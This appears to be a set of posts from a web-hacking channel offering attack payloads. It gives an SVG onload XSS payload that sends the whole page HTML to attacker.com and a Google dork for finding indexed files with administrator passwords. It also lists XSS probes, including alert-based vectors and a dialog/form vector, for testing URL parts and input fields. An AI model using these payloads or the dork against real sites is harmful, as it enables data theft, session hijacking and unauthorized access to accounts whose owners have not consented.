🎯 A payload that sends the current webpage to a remote server

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

🎯 Want an administrator's creds? Google has indexed them for you:

intext:company_keyword & ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:"admin" | intext:"root" | intext:"administrator" & intext:"password" | intext:"root" | intext:"admin" | intext:"administrator"

@WebHacking
Here's a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
- URL query, fragment & path;
- all input fields.

Here's an updated polyglot that uses the details tag and now breaks out of template strings too.

We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>